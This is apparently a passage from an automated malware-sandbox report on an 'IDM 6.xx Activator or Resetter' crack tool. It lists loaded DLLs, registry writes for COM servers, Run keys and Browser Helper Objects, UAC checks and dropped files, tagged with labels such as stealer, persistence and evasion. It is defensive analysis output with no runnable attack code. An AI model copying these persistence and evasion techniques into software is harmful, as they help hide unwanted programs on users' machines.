N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe N/A
N/A N/A C:\Users\Admin\Desktop\IDM 6.xx Activator or Resetter v3.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\IDMan = "C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe /onboot" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\RUNDLL32.EXE N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\NoExplorer = "1" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\NoExplorer = "1" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Download Manager\IDMVMPrs.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_style_3.tbi C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_ar.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_iw.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_al.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMOpExt.nex C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IEExt.htm C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmbrbtn64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_fa.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_hu.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmwfp32.sys C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_bg.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_vn.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_gu.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_mn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_vn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_bn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_it.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmmzcc.xpi C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_ru.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_cht.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_gr.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_hi.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_dk.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File opened for modification C:\Program Files (x86)\Internet Download Manager\IDMSetup2.log C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
